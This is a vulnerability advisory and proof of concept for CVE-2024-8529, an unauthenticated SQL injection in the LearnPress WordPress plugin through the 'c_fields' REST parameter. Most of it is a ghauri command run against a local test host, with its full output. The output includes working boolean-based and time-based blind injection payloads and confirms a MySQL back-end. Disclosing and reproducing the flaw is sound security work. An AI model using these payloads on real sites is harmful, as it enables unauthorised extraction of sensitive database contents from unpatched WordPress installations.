# CVE-2024-8529
LearnPress – WordPress LMS Plugin &lt;= 4.2.7 - Unauthenticated SQL Injection via 'c_fields'

# Description

The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_fields' parameter of the /wp-json/lp/v1/courses/archive-course REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

```
Type: plugin
CVSS Score: 10
CVE: CVE-2024-8529
Slug: learnpress
```
Download Link: [Download learnpress Version 4.2.7](https://downloads.wordpress.org/plugin/learnpress.4.2.7.zip)

# POC

```
ghauri -u "http://kubernetes.docker.internal:80/wp-json/learnpress/v1/courses?c_fields=title,description,duration,-start-date,-end-date" -p c_fields


  ________.__                        .__  {1.3.8}
 /  _____/|  |__ _____   __ _________|__|
/   \  ___|  |  \\__  \ |  |  \_  __ \  |
\    \_\  \   Y  \/ __ \|  |  /|  | \/  |
 \______  /___|  (____  /____/ |__|  |__|
        \/     \/     \/         https://github.com/r0oth3x49
                                 An advanced SQL injection detection & exploitation tool.



[*] starting @ 21:49:47 /2024-10-12/

[21:49:47] [INFO] testing connection to the target URL
[21:49:47] [INFO] testing if the target URL content is stable
[21:49:48] [INFO] target URL content is stable
[21:49:48] [WARNING] heuristic (basic) test shows that GET parameter 'c_fields' might not be injectable
[21:49:48] [INFO] testing for SQL injection on GET parameter 'c_fields'
[21:49:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[21:49:54] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[21:49:58] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[21:50:04] [INFO] testing 'Boolean-based blind - Parameter replace'
[21:50:07] [INFO] GET parameter 'c_fields' appears to be 'Boolean-based blind - Parameter replace' injectable
[21:50:07] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'MySQL'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] n

[21:55:08] [INFO] testing 'MySQL >= 5.0.12 time-based blind (query SLEEP)'
[21:55:15] [INFO] GET parameter 'c_fields' appears to be 'MySQL >= 5.0.12 time-based blind (query SLEEP)' injectable
[21:55:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[21:55:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:55:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:55:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:55:15] [INFO] testing 'MySQL >= 5.1 AND string error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)'
[21:55:15] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[21:55:15] [INFO] checking if the injection point on GET parameter 'c_fields' is a false positive
GET parameter 'c_fields' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n

Ghauri identified the following injection point(s) with a total of 109 HTTP(s) requests:
---
Parameter: c_fields (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace
    Payload: c_fields=(SELECT (CASE WHEN (04869=4869) THEN 03586 ELSE 3*(SELECT 2 UNION ALL SELECT 1) END))

    Type: time-based blind
    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
    Payload: c_fields=(SELECT(0)FROM(SELECT(SLEEP(7)))a)
---
[21:55:27] [INFO] testing MySQL
[21:55:27] [INFO] confirming MySQL
[21:55:27] [INFO] the back-end DBMS is MySQL

[21:55:27] [INFO] fetched data logged to text files under '/Users/rwiggins/.ghauri/kubernetes.docker.internal'
```
